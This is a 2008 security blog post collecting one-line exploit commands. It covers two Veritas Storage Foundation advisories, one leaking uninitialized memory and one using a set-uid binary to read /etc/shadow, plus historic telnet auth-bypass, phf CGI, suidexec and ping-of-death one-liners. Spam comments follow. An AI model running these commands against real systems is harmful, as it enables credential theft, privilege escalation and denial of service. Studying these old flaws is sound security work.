Exploit One-Liners

Very Small Shell Scripts

Every once in a while there are security vulnerabilities publicized that can be exploited with a single command. This week, Security Objectives published advisories for two such vulnerabilities (SECOBJADV-2008-04 and SECOBJADV-2008-05) which I’ll be describing here. I’ll also be revisiting some one-line exploits from security’s past for nostalgia’s sake and because history tends to repeat itself.

Both issues that were discovered are related to Symantec’s Veritas Storage Foundation Suite. They rely on the default set-uid root bits being set on the affected binaries. Before Symantec and Veritas combined, Sun package manager prompted the administrator with an option of removing the set-id bits. The new Symantec installer just went ahead and set the bits without asking (how rude!)

On to the good stuff.. The first weakness is an uninitialized memory disclosure vulnerability. It can be leveraged like so:

/opt/VRTS/bin/qiomkfile -s 65536 -h 4096 foo

Now, the contents of file .foo (note that it is a dot-file) will contain uninitialized memory from previous file system operations–usually from other users. Sensitive information can be harvested by varying the values to the -s and -h flags over a period of time.

This next one is a bit more critical in terms of privilege escalation. It is somewhat similar to the Solaris srsexec hole from last year. Basically, you can provide any file’s pathname on the command line and have it displayed on stderr. As part of the shell command, I’ve redirected standard error back to standard output.

/opt/VRTSvxfs/sbin/qioadmin -p /etc/shadow / 2>&1

Some of these one-liner exploits can be more useful than exploits that utilize shellcode. Kingcope’s Solaris in.telnetd exploit is a beautiful example of that. The really interesting thing about that one was its resurrection–it originally became well-known back in 1994. In 2007, Kingcope’s version won the Pwnie award for best server-side bug.

telnet -l -fusername hostname

Let’s not forget other timeless classics such as the cgi-bin/phf bug, also from the mid-nineties:

lynx http://host.com/cgi-bin/phf?Qalias=/bin/cat%20/etc/passwd

..and Debian’s suidexec hole from the late nineties:

/usr/bin/suidexec /bin/sh /path/to/script


I’m not including exploits that have pipes/semi-colons/backticks/etc. in the command-line because that’s really more than one command being executed. Since the “Ping of Death” is a single command from a commonly installed system utility I’ll be including it here as well. I consider it a true denial of service attack since it does not rely on bandwidth exhaustion:

ping -s70000 -c1 host

EOF

Advertisements

15 Comments »

  1. jhh said

    Not like we can have a security company make secure products, there just wouldn’t be sufficient irony there, now would there?

  2. What’s up to every one, the contents present at this website are in fact amazing for people knowledge, well, keep up the good work fellows.

  3. {
    {I have|I’ve} been {surfing|browsing} online more than {three|3|2|4} hours today, yet I never found any interesting article like yours. {It’s|It is} pretty
    worth enough for me. {In my opinion|Personally|In my view}, if all {webmasters|site owners|websi

  4. I’ve been exploring for a bit for any high-quality articles or weblog posts on this kind of house . Exploring in Yahoo I at last stumbled upon this site. Reading this info So i am happy to express that I’ve
    a very good uncanny feeling I came upon exactly what I needed.
    I most definitely will make sure to do not omit this web site and provides
    it a look on a constant basis.

  5. Utroskap er ingen skam, det har eksistert like lenge som selve
    ideen om monogami. Det aller enkleste er å inkludere rumpehullet i den
    vanlige kosingen og kjælingen med kjønnsorganet,
    uten å stikke fingeren inn:. Bedre er å ha en ”anal douche”
    en ballong du kan fylle opp med væske, helst tilsatt litt
    salt.

  6. Please, can you pm me and also tell me a few more thinks
    regarding this topic, I am really a fan of your blog site.
    Regards!

  7. I do not even know the way I finished up here, however I thought this post was good.
    I do not realize who you might be but definitely you
    are going to a well-known blogger should you aren’t already. Cheers!

  8. Thank you for the auspicious writeup. It if truth be
    told was a enjoyment account it. Look advanced to far added agreeable from you!

    However, how could we be in contact?

  9. Super-Duper website! I’m loving this! Will come back again – getting you feeds as well. Cheers!

  10. Blanche said

    I often do not post in Blogs however your blog pushed me to, impressive job.
    beautiful. It’s been so very much appreciated!

  11. Lola said

    I don’t usually reply to posts however I will in this case. My God, I believed you had been going to chip in with some decisive insight at the end there, not leave it with ‘we leave it to
    you to decide’. Thank you so much, a wonderful job!

  12. This is a very good tip especially to those new to
    the blogosphere. Brief but very precise information… Thank
    you for sharing this one. A must read post!

  13. I am genuinely thankful to the owner of this web site who
    has shared this fantastic piece of writing at at this place.

  14. Hi would you mind stating which blog platform you’re working with? I’m
    looking to start my own blog soon but I’m having a difficult time making a decision between BlogEngine/Wordpress/B2evolution and Drupal. The reason I ask is because your layout seems different then most blogs and I’m looking for
    something unique. P.S Sorry for getting off-topic but I had to ask!

  15. web page said

    hello!,I like your writing so so much! share we be in contact more about your post on AOL?
    I require an expert on this area to unravel my problem.
    Maybe that’s you! Having a look forward to look you.

RSS feed for comments on this post · TrackBack URI

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: